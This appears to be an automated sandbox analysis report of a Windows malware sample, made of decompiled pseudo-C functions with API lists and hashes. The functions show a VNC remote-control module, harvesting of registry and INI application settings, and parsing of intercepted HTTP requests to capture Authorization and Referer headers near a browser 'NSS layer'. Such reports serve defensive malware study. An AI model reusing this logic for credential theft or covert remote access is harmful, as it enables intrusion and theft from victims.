    																											asm("sbb ecx, ecx");
    																											__ecx = __ecx & 0x0000000c;
    																											__ecx = __ecx + 4;
    																										} else {
    																											__ecx =  ~__ecx;
    																											asm("sbb ecx, ecx");
    																											__ecx = __ecx & 0x00000006;
    																											__ecx = __ecx + 2;
    																										}
    																										__esi = __esi | __ecx;
    																									}
    																									__cl =  *(__esp + 0x18);
    																									__cl =  *(__esp + 0x18) & 0x00000004;
    																									if(__cl != (__dl & 0x00000004)) {
    																										if(__cl == 0) {
    																											__al & 0x000000ff =  ~(__al & 0x000000ff);
    																											asm("sbb ecx, ecx");
    																											 ~(__al & 0x000000ff) & 0xfffffff4 = ( ~(__al & 0x000000ff) & 0xfffffff4) + 0x10;
    																											__esi = __esi | ( ~(__al & 0x000000ff) & 0xfffffff4) + 0x00000010;
    																										} else {
    																											__al & 0x000000ff =  ~(__al & 0x000000ff);
    																											asm("sbb eax, eax");
    																											 ~(__al & 0x000000ff) & 0xfffffffa = ( ~(__al & 0x000000ff) & 0xfffffffa) + 8;
    																											__esi = __esi | ( ~(__al & 0x000000ff) & 0xfffffffa) + 0x00000008;
    																										}
    																									}
    																									__cl =  *(__esp + 0x18);
    																									__al = __cl;
    																									__al = __cl & 0x00000002;
    																									if(__al != __dl) {
    																										__al & 0x000000ff =  ~(__al & 0x000000ff);
    																										asm("sbb edx, edx");
    																										 ~(__al & 0x000000ff) & 0xffffffe0 = ( ~(__al & 0x000000ff) & 0xffffffe0) + 0x40;
    																										__esi = __esi | ( ~(__al & 0x000000ff) & 0xffffffe0) + 0x00000040;
    																									}
    																									if((__cl & 0x00000008) != 0) {
    																										__esi = __esi | 0x00000800;
    																										__edi = 0x78;
    																									}
    																									if((__cl & 0x00000010) != 0) {
    																										__esi = __esi | 0x00000800;
    																										__edi = 0xffffff88;
    																									}
    																									__eax = __esp + 0x1c;
    																									__ecx = __esp + 0x38;
    																									__eax = E00410820(__esp + 0x38, __esp + 0x1c, 5);
    																									__edx =  *(__esp + 0x1b) & 0x0000ffff;
    																									__eax =  *(__esp + 0x19) & 0x0000ffff;
    																									_push(__edi);
    																									_push(__edx);
    																									_push(__eax);
    																									__eax =  *(__esp + 0x1a0);
    																									__ecx =  *__eax;
    																									__eax =  *(__eax + 0x18);
    																									__edx = __esi;
    																									__eax =  *__eax();
    																									goto L20;
    																								}
    																								goto L103;
    																							case 6:
    																								__ecx = __esp + 0x7c;
    																								3 = E00414B90(3, __ebx, __esi, __esp + 0x7c);
    																								if(__al != 0) {
    																									__edx = __esp + 0x2c;
    																									4 = E00414B90(4, __ebx, __esi, __esp + 0x2c);
    																									if(__al != 0) {
    																										__ecx =  *(__esp + 0x2c);
    																										__ecx = __ecx & 0x00ff0000;
    																										__ecx = __ecx >> 0x10;
    																										__eax = __ecx & 0x00ff0000 | __ecx >> 0x00000010;
    																										__edx = __ecx;
    																										__edx = __ecx << 0x10;
    																										__edx = __edx | __ecx;
    																										__eax = __eax >> 8;
    																										__eax = __eax | __edx;
    																										 *(__esp + 0x2c) = __eax;
    																										__eax = __eax + 1;
    																										__edi = __eax;
    																										if(__edi == 0) {
    																											0 = E004107C0(0);
    																										} else {
    																											 *(__esp + 0x2c) = E00414B90( *(__esp + 0x2c), __ebx, __esi, __edi);
    																											if(__al != 0) {
    																												__eax =  *(__esp + 0x194);
    																												__ecx =  *__eax;
    																												__edx =  *(__esp + 0x2c);
    																												__eax =  *(__eax + 0x1c);
    																												_push(__edi);
    																												__eax =  *__eax();
    																												__eax = __edi;
    																												__eax = E004107C0(__edi);
    																												goto L20;
    																											}
    																										}
    																									}
    																								}
    																								goto L103;
    																						}
    																					}
    																				}
    																				goto L103;
    																			}
    																		}
    																		L60:
    																	} while ( *(__ebp + 0x1c) != 0);
    																	__edx =  *0x42e6d4;
    																	__eax = HeapAlloc( *0x42e6d4, 8, 0x404);
    																	__ecx =  *(__esp + 0x20);
    																	 *( *(__esp + 0x20) + 0x1c) = __eax;
    																} while (__eax != 0);
    																goto L103;
    															} else {
    																_push(0);
    																_push(_t356);
    																_push( *((intOrPtr*)(_t365 + 0x28)));
    																_push(_t279);
    																if( *_t362() != _t356) {
    																	goto L104;
    																} else {
    																	goto L19;
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							goto L107;
    						}
    						_t204 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
    						if(_t204 != 0) {
    							goto L106;
    						} else {
    							goto L7;
    						}
    					}
    				}
    				L107:
    			}






























    APIs
    • send.WS2_32(?,RFB 003.003,0000000C,00000000), ref: 00406371
      • Part of subcall function 00414B90: select.WS2_32 ref: 00414BF1
      • Part of subcall function 00414B90: recv.WS2_32(?,?,00000007,00000000), ref: 00414C01
    • send.WS2_32(?,?,00000004,00000000), ref: 00406469
    • send.WS2_32(?,?,00000018,00000000), ref: 004065B0
    • send.WS2_32(?,?,00000000,00000000), ref: 004065C8
    • WSAGetLastError.WS2_32(00000000,?,?,000000FF,?,?,?,?,?,?,?,00000000,000000FF), ref: 00406638
    • WaitForSingleObject.KERNEL32(?,000000FF,?,000000FF,?,?,?,?,?,?,?,00000000,000000FF), ref: 00406657
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: send$ErrorLastObjectSingleWaitrecvselect
    • String ID: RFB 003.003
    • API String ID: 3971626918-2627274552
    • Opcode ID: ef5e754e13e83abf2c3739610a35e3cc414bf3ddb7cd57faa41aa5b6b53f8ccd
    • Instruction ID: 3952e8df2bb402d62c3e4228bd58d56ce1fddc858744c8027cdde5a9cffd1fda
    • Opcode Fuzzy Hash: ef5e754e13e83abf2c3739610a35e3cc414bf3ddb7cd57faa41aa5b6b53f8ccd
    • Instruction Fuzzy Hash: BEB1C2311083019BE720EB29C890BAFB3E5EFC4314F05493EF5DAA72D1DA39D955879A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E00421030(void* __eflags) {
    				char _v660;
    				short _v1180;
    				short _v1188;
    				short _v1200;
    				short _v1700;
    				void* _v1712;
    				short _v1720;
    				short _v1742;
    				char _v1784;
    				char _v1864;
    				char _v1880;
    				char _v1916;
    				char _v1928;
    				char _v1948;
    				intOrPtr _v1984;
    				intOrPtr _v1988;
    				char _v1992;
    				intOrPtr _v1996;
    				intOrPtr _v2000;
    				char* _v2004;
    				char* _v2008;
    				char _v2016;
    				void* _v2020;
    				char _v2028;
    				char _v2032;
    				intOrPtr _v2036;
    				char _v2040;
    				void* __esi;
    				void* _t58;
    				void* _t59;
    				void* _t70;
    				void* _t74;
    				intOrPtr* _t90;
    				void* _t125;
    				signed int _t126;
    				char* _t132;
    				intOrPtr _t133;
    				char* _t136;
    				char* _t137;
    				void** _t139;
    				intOrPtr _t152;
    
    				_t139 =  &_v2020;
    				E00410870( &_v2020,  &_v2020, 0, 8);
    				E00424100(0x6a,  &_v1784);
    				E00424100(0x6b,  &_v1916);
    				_t58 = E00416420(0x80000001,  &_v1784,  &_v1916, 0x104);
    				if(_t58 != 0xffffffff && _t58 != 0) {
    					ExpandEnvironmentStringsW( &_v1700,  &_v1180, 0x104);
    					_push( &_v2020);
    					_push( &_v1180);
    					E00420D80();
    					PathRemoveFileSpecW( &_v1188);
    				}
    				if(_v2016 == 0) {
    					E00424100(0x6d,  &_v1928);
    					E00424100(0x6e,  &_v1880);
    					_t132 =  &_v1948;
    					E00424100(0x6f, _t132);
    					_t90 = __imp__SHGetFolderPathW;
    					_v1996 = 0x24;
    					_v1992 = 0x1a;
    					_v1988 = 0x26;
    					_v1984 = 0x23;
    					_v2008 =  &_v1928;
    					_v2004 =  &_v1880;
    					_v2000 = _t132;
    					_t126 = 0;
    					do {
    						_t133 =  *((intOrPtr*)(_t139 + 0x28 + _t126 * 4));
    						_t70 =  *_t90(0, _t133, 0, 0,  &_v1700);
    						if(_t70 == 0) {
    							if(_t133 == 0x24) {
    								_t137 =  &_v1992;
    								_t29 = _t70 + 0x64; // 0x64
    								E00424100(_t29, _t137);
    								_v2032 = _t137;
    								E00418700( &_v1720,  &_v2032, 1, 4, E00420F90,  &_v2040, 0, 0, 0);
    								_v1742 = 0;
    							}
    							E00418700( &_v1720,  &_v2028, 3, 2, E00420F90,  &_v2040, 0, 0, 0);
    						}
    						_t126 = _t126 + 1;
    					} while (_t126 < 4);
    					if(_v2036 == 0) {
    						E00424100(0x6a,  &_v1864);
    						E00424100(0x6c,  &_v2016);
    						_t74 = E00416420(0x80000001,  &_v1864,  &_v2016, 0x104);
    						if(_t74 != 0xffffffff && _t74 != 0) {
    							ExpandEnvironmentStringsW( &_v1720,  &_v1200, 0x104);
    							_t136 =  &_v1992;
    							E00424100(0x64, _t136);
    							_v2032 = _t136;
    							E00418700( &_v1200,  &_v2032, 1, 5, E00420F90,  &_v2040, 0, 0, 0);
    						}
    						_t152 = _v2036;
    					}
    				}
    				_t59 = _v2020;
    				if(_t152 <= 0) {
    					if(_t59 != 0) {
    						return HeapFree( *0x42e6d4, 0, _t59);
    					}
    					goto L22;
    				} else {
    					_t125 = _t59;
    					if(_t59 == 0) {
    						L22:
    						return _t59;
    					} else {
    						if( *_t59 != 0) {
    							E00424100(0x70,  &_v660);
    							E0040D880(_t125, 0xcb,  &_v660);
    						}
    						return HeapFree( *0x42e6d4, 0, _t125);
    					}
    				}
    			}













































    APIs
      • Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
      • Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
      • Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,00000000,00000000,00000008,?,00000000), ref: 004210AF
      • Part of subcall function 00420D80: HeapAlloc.KERNEL32(?,00000008,00020002,?,?,74B04770), ref: 00420D9D
      • Part of subcall function 00420D80: GetPrivateProfileStringW.KERNEL32 ref: 00420DC1
      • Part of subcall function 00420D80: HeapAlloc.KERNEL32(?,00000008,00000C0C,?,?,74B04770), ref: 00420DFF
      • Part of subcall function 00420D80: StrStrIW.SHLWAPI(00000000,?,?,?,74B04770), ref: 00420E6C
      • Part of subcall function 00420D80: StrStrIW.SHLWAPI(-00000002,?,?,?,74B04770), ref: 00420E7C
      • Part of subcall function 00420D80: GetPrivateProfileStringW.KERNEL32 ref: 00420E94
      • Part of subcall function 00420D80: GetPrivateProfileStringW.KERNEL32 ref: 00420EB7
    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,00000000), ref: 004210CB
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00421163
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000024,00000104), ref: 00421245
    • HeapFree.KERNEL32(?,00000000,?,?,?,00000104,00000000,00000000), ref: 004212C0
    • HeapFree.KERNEL32(?,00000000,?,?,?,00000104,00000000,00000000), ref: 004212DE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$PrivateProfileString$AllocEnvironmentExpandFreePathStrings$CloseFileFolderOpenQueryRemoveSpecValue
    • String ID: #$$$&
    • API String ID: 743069011-1941049543
    • Opcode ID: 591d727fd1ab4c15de1e2a95feddfff9c4d3295e6a2162fb59cd896887fd13be
    • Instruction ID: 0c6f8feb1dbcdba425f965105de872fdeaf14a7492968b8942b9b526d7a92bba
    • Opcode Fuzzy Hash: 591d727fd1ab4c15de1e2a95feddfff9c4d3295e6a2162fb59cd896887fd13be
    • Instruction Fuzzy Hash: A661D2317043509BE724DB51EC45BEB77E4EBD4704F80091EFA44A72D0DBB8A949CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004130B0(signed int __ecx, void* _a4, char* _a8) {
    				long _v16;
    				void* _v20;
    				void _v44;
    				long _v48;
    				intOrPtr _v64;
    				long _t14;
    				char* _t18;
    				signed char _t24;
    				char* _t25;
    				long _t27;
    				signed int _t32;
    				void* _t33;
    
    				_t24 = __ecx;
    				_t32 = __ecx & 0x00000002;
    				_t14 = 0x8404f700;
    				if(_t32 != 0) {
    					_t14 = 0x8444f700;
    				}
    				if((_t24 & 0x00000004) != 0) {
    					_t14 = _t14 | 0x00800000;
    				}
    				_t25 = "POST";
    				if((_t24 & 0x00000001) == 0) {
    					_t25 = "GET";
    				}
    				_t33 = HttpOpenRequestA(_a4, _t25, _a8, "HTTP/1.1", 0, "�2@", _t14, 0);
    				if(_t33 == 0) {
    					L15:
    					return 0;
    				} else {
    					if(_t32 == 0) {
    						_t18 = "Connection: close\r\n";
    						_t27 = 0x13;
    					} else {
    						_t18 = 0;
    						_t27 = 0;
    					}
    					if(HttpSendRequestA(_t33, _t18, _t27, _v20, _v16) == 0) {
    						L14:
    						InternetCloseHandle(_t33);
    						goto L15;
    					} else {
    						_v44 = 0;
    						_v48 = 4;
    						if(HttpQueryInfoA(_t33, 0x20000013,  &_v44,  &_v48, 0) == 0 || _v64 != 0xc8) {
    							goto L14;
    						} else {
    							return _t33;
    						}
    					}
    				}
    			}

    APIs
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,2@,8404F700,00000000), ref: 004130F6
    • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00413123
    • HttpQueryInfoA.WININET(00000000,20000013,?,00000000,00000000), ref: 0041314F
    • InternetCloseHandle.WININET(00000000), ref: 0041316B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
    • String ID: Connection: close$GET$HTTP/1.1$POST$2@
    • API String ID: 3080274660-1133444706
    • Opcode ID: 266f5adb9e242c4b9f494675b2f83ed68e544811eaa5d67763d17b2bcf182756
    • Instruction ID: 6797f585fb37d3056b566bfe1870134109758c198d95b427b5be863bbfd09e55
    • Opcode Fuzzy Hash: 266f5adb9e242c4b9f494675b2f83ed68e544811eaa5d67763d17b2bcf182756
    • Instruction Fuzzy Hash: CD11D6B23052016BE320CE588C04FE766D8ABD4716F00452EF641E72A1D7BCDE8187AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E004079C0() {
    				void* __edi;
    				void* __esi;
    				signed int _t123;
    				char _t130;
    				char* _t133;
    				char* _t138;
    				void* _t143;
    				void* _t144;
    				void* _t146;
    				char* _t147;
    				void* _t149;
    				void* _t162;
    				char _t170;
    				signed int _t171;
    				char** _t172;
    				void* _t174;
    				signed int _t176;
    				signed int _t177;
    				signed int _t178;
    				void* _t179;
    				signed char _t195;
    				char* _t196;
    				void* _t197;
    				void* _t201;
    				void* _t202;
    				signed int _t203;
    				char* _t204;
    				signed int _t205;
    				signed char _t218;
    				void* _t222;
    				void* _t223;
    				signed int _t225;
    				char* _t226;
    				signed int _t228;
    				signed int _t229;
    				char* _t232;
    				intOrPtr* _t234;
    				void* _t236;
    				void* _t237;
    				char* _t238;
    				void* _t242;
    				char* _t244;
    				char* _t245;
    				char* _t247;
    				intOrPtr _t248;
    				void* _t249;
    
    				_t203 =  *(_t249 + 0x44);
    				_t123 = E00410870( *((intOrPtr*)(_t249 + 0x3c)),  *((intOrPtr*)(_t249 + 0x3c)), 0, 0x48);
    				_t244 = _t203 +  *((intOrPtr*)(_t249 + 0x58));
    				_t171 = _t203;
    				 *(_t249 + 0x28) = _t244;
    				if(_t203 < _t244) {
    					goto L3;
    					while(1) {
    						L4:
    						_t202 =  *_t123;
    						if(_t202 == 0xa || _t202 == 0xd) {
    							goto L7;
    						}
    						_t123 =  &(1[_t123]);
    						if(_t123 < _t244) {
    							continue;
    						}
    						goto L7;
    					}
    					L7:
    					_t176 =  &(1[_t123]);
    					_t222 = _t123 - _t171;
    					if(_t176 < _t244 &&  *_t123 == 0xd &&  *_t176 == 0xa) {
    						_t123 = _t176;
    					}
    					_t171 =  &(1[_t123]);
    					if(_t222 == 0) {
    						goto L1;
    					} else {
    						if(_t232 == _t203) {
    							_t223 = _t222 + _t232;
    							_t177 = 0;
    							if(_t232 >= _t223) {
    								goto L1;
    							} else {
    								do {
    									_t123 =  *_t232;
    									if(_t123 == 0x20 || _t123 >= 9 && _t123 <= 0xd) {
    										if(_t177 < 2) {
    											 *(_t249 + 0x34 + _t177 * 4) = _t232;
    										}
    										_t177 =  &(1[_t177]);
    									}
    									_t232 =  &(_t232[1]);
    								} while (_t232 < _t223);
    								if(_t177 != 2) {
    									goto L1;
    								} else {
    									_t234 =  *((intOrPtr*)(_t249 + 0x38)) + 1;
    									goto L33;
    								}
    							}
    						} else {
    							if(_t222 == 0) {
    								L16:
    								if(_t171 < _t244) {
    									_t203 =  *(_t249 + 0x54);
    									L3:
    									_t232 = _t171;
    									_t123 = _t171;
    									if(_t171 < _t244) {
    										goto L4;
    									}
    									goto L7;
    								} else {
    									return _t123 | 0xffffffff;
    								}
    							} else {
    								_t123 = StrCmpNIA(2, _t232, 0);
    								if(_t123 != 0 ||  *_t232 != 0x3a) {
    									goto L16;
    								} else {
    									_t223 = _t222 + _t232;
    									do {
    										_t170 = _t232[1];
    										_t232 =  &(_t232[1]);
    									} while (_t170 == 0x20 || _t170 >= 9 && _t170 <= 0xd);
    									_t203 =  *(_t249 + 0x54);
    									L33:
    									_t123 = _t223 - _t234;
    									if(_t234 == 0) {
    										goto L1;
    									} else {
    										if(_t123 == 0xffffffff) {
    											_t123 = 0;
    											if( *_t234 != 0) {
    												do {
    													_t123 =  &(1[_t123]);
    												} while ( *((char*)(_t123 + _t234)) != 0);
    											}
    										}
    										if(_t123 != 8) {
    											_t123 = _t123 - 8;
    											if(_t123 == 0) {
    												goto L44;
    											} else {
    												goto L43;
    											}
    										} else {
    											_t201 = 0;
    											while(1) {
    												_t17 = _t201 + "HTTP/1.1"; // 0x50545448
    												_t123 =  *((char*)(_t201 + _t234)) -  *_t17;
    												if(_t123 != 0) {
    													break;
    												}
    												_t201 = _t201 + 1;
    												if(_t201 < 8) {
    													continue;
    												} else {
    													L44:
    													_t225 = _t203;
    													if(_t203 >= _t244) {
    														goto L1;
    													} else {
    														_t204 = _t244;
    														do {
    															_t245 = _t225;
    															_t123 = _t225;
    															if(_t225 < _t204) {
    																while(1) {
    																	_t197 =  *_t123;
    																	if(_t197 == 0xa || _t197 == 0xd) {
    																		goto L50;
    																	}
    																	_t123 =  &(1[_t123]);
    																	if(_t123 < _t204) {
    																		continue;
    																	}
    																	goto L50;
    																}
    															}
    															L50:
    															_t178 =  &(1[_t123]);
    															_t236 = _t123 - _t225;
    															if(_t178 < _t204 &&  *_t123 == 0xd &&  *_t178 == 0xa) {
    																_t123 = _t178;
    															}
    															_t225 =  &(1[_t123]);
    															if(_t236 == 0) {
    																goto L1;
    															} else {
    																if(_t245 ==  *(_t249 + 0x54)) {
    																	_t237 = _t236 + _t245;
    																	_t205 = 0;
    																	_t123 = _t245;
    																	if(_t245 >= _t237) {
    																		goto L1;
    																	} else {
    																		do {
    																			_t179 =  *_t123;
    																			if(_t179 == 0x20 || _t179 >= 9 && _t179 <= 0xd) {
    																				if(_t205 < 2) {
    																					 *(_t249 + 0x34 + _t205 * 4) = _t123;
    																				}
    																				_t205 =  &(1[_t205]);
    																			}
    																			_t123 =  &(1[_t123]);
    																		} while (_t123 < _t237);
    																		if(_t205 != 2) {
    																			goto L1;
    																		} else {
    																			_t247 =  &(1[ *(_t249 + 0x34)]);
    																			_t123 =  *((intOrPtr*)(_t249 + 0x38)) - _t247;
    																			 *(_t249 + 0x18) = _t123;
    																			goto L77;
    																		}
    																	}
    																} else {
    																	if(_t236 == 0) {
    																		goto L59;
    																	} else {
    																		_t123 = StrCmpNIA(1, _t245, 0);
    																		if(_t123 != 0 ||  *_t245 != 0x3a) {
    																			goto L59;
    																		} else {
    																			_t242 = _t236 + _t245;
    																			do {
    																				_t123 = _t245[1];
    																				_t245 =  &(_t245[1]);
    																			} while (_t123 == 0x20 || _t123 >= 9 && _t123 <= 0xd);
    																			 *(_t249 + 0x18) = _t242 - _t245;
    																			L77:
    																			if(_t247 == 0 ||  *(_t249 + 0x18) == 0) {
    																				goto L1;
    																			} else {
    																				_push(_t249 + 0x24);
    																				_push(0);
    																				_push( *((intOrPtr*)(_t249 + 0x58)));
    																				_push( *(_t249 + 0x54));
    																				_t123 = E00417950();
    																				 *(_t249 + 0x30) = _t123;
    																				if(_t123 == 0 ||  *((intOrPtr*)(_t249 + 0x24)) == 0) {
    																					goto L1;
    																				} else {
    																					_push(_t249 + 0x20);
    																					_push("Host");
    																					_push( *((intOrPtr*)(_t249 + 0x58)));
    																					_push( *(_t249 + 0x54));
    																					_t123 = E00417950();
    																					 *(_t249 + 0x2c) = _t123;
    																					if(_t123 == 0 ||  *((intOrPtr*)(_t249 + 0x20)) == 0) {
    																						goto L1;
    																					} else {
    																						_push(_t249 + 0x28);
    																						_push(3);
    																						_push( *((intOrPtr*)(_t249 + 0x58)));
    																						_push( *(_t249 + 0x54));
    																						_t123 = E00417950();
    																						 *(_t249 + 0x34) = _t123;
    																						if(_t123 == 0) {
    																							goto L1;
    																						} else {
    																							_push(_t249 + 0x14);
    																							_push("Content-Length");
    																							_push( *((intOrPtr*)(_t249 + 0x58)));
    																							_push( *(_t249 + 0x54));
    																							 *(_t249 + 0x2c) = 0;
    																							_t123 = E00417950();
    																							_t184 = _t123;
    																							if(_t123 == 0) {
    																								if( *(_t249 + 0x28) != 0) {
    																									goto L1;
    																								} else {
    																									goto L91;
    																								}
    																							} else {
    																								_t123 =  *(_t249 + 0x14);
    																								if(_t123 == 0 || _t123 > 0xa) {
    																									goto L1;
    																								} else {
    																									E00410DE0(_t123, _t184, _t249 + 0x3c);
    																									_t123 = E004110A0(_t249 + 0x3c, _t249 + 0x13);
    																									if( *((char*)(_t249 + 0x13)) != 0) {
    																										goto L1;
    																									} else {
    																										_t196 =  *(_t249 + 0x28);
    																										if(_t123 < _t196) {
    																											goto L1;
    																										} else {
    																											 *((intOrPtr*)(_t249 + 0x1c)) = _t123 - _t196;
    																											L91:
    																											_t130 = ( *(_t249 + 0x50))[0x14];
    																											_t172 =  *(_t249 + 0x4c);
    																											 *_t172 = 2;
    																											_t226 = "http://";
    																											_t238 = 7;
    																											if(_t130 > 0) {
    																												_t226 =  *0x42d3b0(_t130);
    																												_t249 = _t249 + 4;
    																												if(_t226 != 0) {
    																													_t162 = 0;
    																													_t174 = _t226 - "NSS layer";
    																													while(1) {
    																														_t64 = _t174 + "NSS layer"; // 0x2053534e
    																														_t195 =  *((intOrPtr*)(_t162 + _t64));
    																														_t65 = _t162 + "NSS layer"; // 0x2053534e
    																														_t218 =  *_t65;
    																														if(_t195 != _t218) {
    																															break;
    																														}
    																														_t162 = _t162 + 1;
    																														if(_t162 < 9) {
    																															continue;
    																														} else {
    																															L98:
    																															_t226 = "https://";
    																															_t238 = 8;
    																														}
    																														L99:
    																														_t172 =  *(_t249 + 0x4c);
    																														goto L100;
    																													}
    																													if((_t195 & 0x000000ff) == (_t218 & 0x000000ff)) {
    																														goto L98;
    																													}
    																													goto L99;
    																												}
    																											}
    																											L100:
    																											_t70 =  *(_t249 + 0x18) + 9; // 0x9
    																											_t133 = E004107A0( *((intOrPtr*)(_t249 + 0x20)) + _t70);
    																											_t172[2] = _t133;
    																											if(_t133 != 0) {
    																												E00410820(_t133, _t226, _t238);
    																												_t172[3] = _t238;
    																												_t172[3] =  &(_t172[3][E00410820( &(_t172[2][_t238]),  *(_t249 + 0x2c),  *((intOrPtr*)(_t249 + 0x20)))]);
    																												_t138 = _t172[3];
    																												if( *_t247 != 0x2f) {
    																													_t138[_t172[2]] = 0x2f;
    																													_t172[3] =  &(_t138[1]);
    																												}
    																												_t172[3] =  &(_t172[3][E00410820( &(_t172[3][_t172[2]]), _t247,  *(_t249 + 0x18))]);
    																												_t248 =  *((intOrPtr*)(_t249 + 0x58));
    																												_t172[3][_t172[2]] = 0;
    																												_push(_t249 + 0x14);
    																												_push("Referer");
    																												_push(_t248);
    																												_push( *(_t249 + 0x54));
    																												_t143 = E00417950();
    																												_t239 = _t143;
    																												if(_t143 != 0) {
    																													_t229 =  *(_t249 + 0x14);
    																													if(_t229 != 0) {
    																														_t172[4] = E00410E10(_t229, _t239);
    																														_t172[5] = _t229;
    																													}
    																												}
    																												_t144 =  *( *(_t249 + 0x30));
    																												if(_t144 != 0x50 ||  *((intOrPtr*)(_t249 + 0x24)) != 4) {
    																													if(_t144 == 0x47 &&  *((intOrPtr*)(_t249 + 0x24)) == 3) {
    																														_t172[6] = 0;
    																														goto L112;
    																													}
    																												} else {
    																													_t172[6] = 1;
    																													L112:
    																													_push(_t249 + 0x14);
    																													_push("Content-Type");
    																													_push(_t248);
    																													_push( *(_t249 + 0x54));
    																													_t146 = E00417950();
    																													_t240 = _t146;
    																													if(_t146 != 0) {
    																														_t228 =  *(_t249 + 0x14);
    																														if(_t228 != 0) {
    																															_t172[7] = E00410E10(_t228, _t240);
    																															_t172[8] = _t228;
    																														}
    																													}
    																													_t147 =  *(_t249 + 0x28);
    																													_t107 = _t147 - 1; // -1
    																													if(_t107 <= 0xfffff) {
    																														_t172[9] =  *(_t249 + 0x34);
    																														_t172[0xa] = _t147;
    																													}
    																													_push(_t249 + 0x14);
    																													_push("Authorization");
    																													_push(_t248);
    																													_push( *(_t249 + 0x54));
    																													_t149 = E00417950();
    																													_t241 = _t149;
    																													if(_t149 != 0) {
    																														_t227 =  *(_t249 + 0x14);
    																														if( *(_t249 + 0x14) != 0 && E00417ED0(_t149,  &(_t172[0xb]),  &(_t172[0xc])) == 0) {
    																															_t172[0xd] = E00410E10(_t227, _t241);
    																														}
    																													}
    																													_t172[0x10] = E00423A90();
    																													_t172[0x11] = E0040C250();
    																													_t172[1] =  *(_t249 + 0x50);
    																												}
    																											}
    																											return  *((intOrPtr*)(_t249 + 0x1c));
    																										}
    																									}
    																								}
    																							}
    																						}
    																					}
    																				}
    																			}
    																		}
    																	}
    																}
    															}
    															goto L123;
    															L59:
    															_t204 =  *(_t249 + 0x28);
    														} while (_t225 < _t204);
    														return _t123 | 0xffffffff;
    													}
    												}
    												goto L123;
    											}
    											L43:
    											_t123 = (0 | _t123 > 0x00000000) + (0 | _t123 > 0x00000000) - 1;
    											if(_t123 != 0) {
    												goto L1;
    											} else {
    												goto L44;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				} else {
    					L1:
    					return _t123 | 0xffffffff;
    				}
    				L123:
    			}

    APIs
    • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,00000000,00000048,?,00000000,?,?), ref: 00407A3F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: Authorization$Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
    • API String ID: 0-1017483493
    • Opcode ID: 21821707a315e6482d1e7db17395ef25ba7aaa64400c530fee0aa85154258544
    • Instruction ID: 5d33599ef9a5f628cf7e6241bf96a333194a9143598dfe9232fac7c71acd41c8
    • Opcode Fuzzy Hash: 21821707a315e6482d1e7db17395ef25ba7aaa64400c530fee0aa85154258544
    • Instruction Fuzzy Hash: F9F1E971A0C3414BD720CE28C490B6BB7E59B85314F14897FE884AB395D679FC85CB9B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00421310(WCHAR* __ecx, signed char* __edx, intOrPtr _a4) {
    				short _v524;
    				short _v532;
    				short _v536;
    				char _v576;
    				short _v596;
    				char _v608;
    				short _v612;
    				char _v620;
    				short _v624;
    				char _v628;
    				short _v632;
    				char _v636;
    				short _v640;
    				void* _v644;
    				WCHAR* _v648;
    				WCHAR* _v652;
    				WCHAR* _v656;
    				void* __ebx;
    				void* __esi;
    				WCHAR* _t44;
    				long _t50;
    				WCHAR* _t63;
    				void* _t64;
    				int _t69;
    				void* _t78;
    				void* _t80;
    				WCHAR* _t86;
    				WCHAR* _t87;
    				WCHAR* _t90;
    				signed int _t116;
    				void* _t119;
    				signed char* _t122;
    				intOrPtr _t133;
    				WCHAR* _t134;
    				signed int _t136;
    				void* _t138;
    
    				_t90 = __ecx;
    				_t138 = (_t136 & 0xfffffff8) - 0x284;
    				_t122 = __edx;
    				_t44 = __edx + 0x2c;
    				if(_t44 != 0) {
    					L1:
    					_t116 =  *_t44 & 0x0000ffff;
    					if(_t116 == 0x5c || _t116 == 0x2f) {
